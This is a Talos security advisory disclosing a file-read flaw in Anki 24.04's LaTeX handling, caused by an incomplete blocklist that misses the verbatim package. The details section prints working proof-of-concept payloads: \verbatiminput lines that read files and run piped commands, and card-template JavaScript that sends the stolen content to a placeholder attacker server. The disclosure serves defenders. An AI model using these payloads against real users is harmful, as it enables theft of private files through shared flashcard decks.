Talos Vulnerability Report

TALOS-2024-1992

Ankitects Anki Latex Incomplete Blocklist Vulnerability

July 22, 2024

CVE Number

CVE-2024-29073

SUMMARY

An vulnerability in the handling of Latex exists in Ankitects Anki 24.04. When Latex is sanitized to prevent unsafe commands, the verbatim package, which comes installed by default in many Latex distributions, has been overlooked. A specially crafted flashcard can lead to an arbitrary file read. An attacker can share a flashcard to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ankitects Anki 24.04

PRODUCT URLS

Anki - <https://apps.ankiweb.net/&gt;

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CWE

CWE-829 - Inclusion of Functionality from Untrusted Control Sphere

DETAILS

Anki is an open-source program that helps with memorization of information through the use of flash cards. It supports syncing of these cards across multiple computers as well as sharing cards with other users. It supports multiple different content types such as images, audio, videos, and scientific notation (via LaTeX).

Anki offers users the option to publicy share their decks, and it is normal behaviour to use them; there are no warnings or checks in place to prevent using cards from someone else. A malicious user could share a deck to trigger the following vulnerability.

Anki uses LaTeX to show images or other TeX models in the flashcards. This requires a Latex handler to be installed, for Windows the Anki documentation suggests users install MiKTeX. There are some TeX commands which will allow you to do things you shouldn’t do, such as read files or write files.

Anki has a blocklist preventing the use of commands that reads file descriptors, but verbatim package command seems to have been overlooked (the package comes bundled with all LaTeX distributions).

An attacker using specialy crafted card’s header section :

\documentclass[12pt]{article}
\special{papersize=3in,5in}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath,verbatim}
\pagestyle{empty}
\setlength{\parindent}{0in}
\begin{document}

can load verbatim package and further abuse its functionality. Using verbatiminput tag inside card body an attacker can perform the following operations:

For arbitrary file read:

[latex]\verbatiminput{PATH_TO_FILE}[/latex]

For system information:

[latex]\verbatiminput{|texosquery-jre8 -o -r -a -l}[/latex]

Or for listing directories / files:

[latex]\verbatiminput{|kpsewhich ~/*}[/latex]

The attacker can read the result of the rendered tags by exploiting the fact that the content will be associated with the HTML document tag called “img.latex”. With this knowledge, we can add appropriate JavaScript code to the card template.

const latex_image = document.querySelector("img.latex").getAttribute("src");
fetchFileAndConvertToBase64(`http://${window.location.hostname}:${window.location.port}/${latex_image}`).then(base64Data => postBase64ToUrl(`http://${REPLACE_HOST_HERE}/upload`, base64Data))

which will obtain img.latex content and send it to attacker controled server.

TIMELINE

2024-05-27 - Vendor Disclosure
2024-06-24 - Vendor Patch Release
2024-07-22 - Public Release

Credit

Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B.

---

Vulnerability Reports Next Report

TALOS-2024-2002

Previous Report

TALOS-2024-1993